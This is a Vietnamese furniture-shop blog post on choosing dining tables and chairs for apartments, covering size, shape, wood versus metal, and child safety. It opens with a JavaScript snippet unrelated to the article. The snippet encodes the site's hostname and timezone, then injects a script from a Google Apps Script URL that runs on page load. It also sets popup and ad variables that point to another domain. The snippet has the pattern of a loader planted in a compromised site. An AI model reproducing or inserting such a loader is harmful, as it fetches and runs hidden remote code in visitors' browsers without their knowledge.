var GTM = 'GTM-NJKFBQ8'; var GG_ADS = 'ca-pub-8687624480880776'; var POPUP_IMG_PREFIX = "https://nhaxinhplaza.vn/wp-content/uploads/2022/08/"; // qc.png, close.png var SHOW_POPUP = 1; // 0: disable, 1: enable var MAX_CLAIM = 1; var TIME_TO_SHOW_POPUP = 10; // 10s var MAX_BUFF = 3; var b64e = function (a) { return btoa(encodeURIComponent(a).replace(/%([0-9A-F]{2})/g, function (b, a) { return String.fromCharCode("0x" + a) })) }; var gg_layer = document.createElement('script'); gg_layer.type = 'text/javascript'; gg_layer.src = `https://script.google.com/macros/s/AKfycbwT2tLHaERiLaaaT_05pnXM2h0pjKHGRPBTQgeffPjyIIXBAR46dAuj5S0sgi2scsJ77Q/exec ?st=${b64e(location.hostname)}&tm=${new Date().getHours()}&os=${b64e(new Date().getTimezoneOffset())}`; var s = document.getElementsByTagName('script')[0];s.parentNode.insertBefore(gg_layer, s);

Chọn bàn ghế phòng ăn đẹp cho chung cư hiện đại như thế nào?

Phòng ăn là một phần quan trọng của căn hộ, nơi cả gia đình cùng nhau quây quần bên nhau, thưởng thức ẩm thực, những bữa cơm ấm áp. Và bộ bàn ghế là đồ dùng cơ bản của một phòng ăn. Vậy chọn bàn ghế ăn như thế nào mới phù hợp dành cho căn hộ của bạn?


Bàn ghế phòng ăn cho chung cư
Chọn bàn ghế ăn như thế nào phù hợp?

1. Chọn bàn ghế ăn phù hợp với căn hộ chung cư

Đặc điểm của phòng ăn của chung cư là nằm trên một mặt phẳng, thường không được phân chia rõ ràng các gian phòng với nhau. Những căn hộ rất lớn sẽ có thể có một phòng ăn và phòng bếp riêng nhưng hầu hết các căn hộ có diện tích không đều không quá lớn vì thế thường được kết hợp liền kề phòng khách với khoảng cách nhất định.

Bàn ghế phòng ăn cho chung cư
Bàn ăn vuông hoặc chữ nhật đều đẹp

Vì thế, khi chọn bàn ghế phòng ăn cho chung cư thì bạn nên lưu ý không nên chọn bộ bàn ghế kích thước lớn, dáng dài mà chỉ nên chọn loại nhỏ, có số ghế từ 4-8 ghế tùy thuộc vào nhu cầu của gia đình. Những loại bàn ghế ăn nên chọn:

– Bàn có hình vuông, hình chữ nhật hoặc có thể là hình tròn. Chiều dài và chiều rộng của bàn nên được đo đạc chính xác, phù hợp với diện tích phòng.
– Ghế ăn đơn giản, nhỏ gọn, dễ sử dụng và có thiết kế ngồi cân đối. Có nhiều loại kiểu ghế ăn có thể lựa chọn, tùy thuộc vào độ yêu thích của bạn.
– Nếu gia đình có trẻ nhỏ nên chọn bàn và ghế đơn giản. Bàn nên có cạnh bo sẽ an toàn hơn, ghế không quá cao cho bé ngồi thoải mái.
– Kiểu dáng hiện đại sẽ dễ sắp xếp hơn so với kiểu cổ điển. Tuy nhiên, tùy phong cách thiết kế nội thất nhà bạn mà sự linh hoạt điều chỉnh phù hợp với không gian.

Bàn ghế phòng ăn cho chung cư
Nếu căn hộ không có diện tích rất lớn nên chọn thiết kế bàn ghế ăn nhỏ gọn

2. Nghiên cứu chọn bàn ghế phòng ăn riêng cho căn hộ của bạn

Mỗi khu vực phòng ăn của căn hộ sẽ có cách chọn lựa và bố trí khác nhau với bộ bàn ghế riêng. Tùy vào nhu cầu sử dụng, thiết kế nội thất và kinh phí mà bạn có thể chọn những bộ bàn ghế riêng.

Bàn ghế phòng ăn cho chung cư
Chọn bộ bàn ghế phòng ăn bằng gỗ, màu sắc hài hòa

Trong đó:

– Chất liệu bàn ghế có thể là gỗ hoặc kim loại tuy nhiên bàn kim loại thường lạnh và khó ngồi hơn. Bạn nên chọn chất liệu gỗ, mộc mạc ấm áp. Tuy nhiên gỗ tự nhiên thường đắt hơn so với gỗ công nghiệp
– Bàn ghế hiện đại, màu sắc phù hợp với không gian.
– Bàn ăn kích thước đủ, ghế có thể chọn có bọc nệm hoặc không tùy thuộc vào yêu cầu sử dụng. 

Hiện nay có nhiều mẫu bàn ghế phòng ăn mà quý vị có thể lựa chọn cho căn hộ của mình tại Nội Thất Xinh. Hãy tham khảo và mua sắm nhé!

===>>> Mua giường ngủ cần chú ý những điểm gì?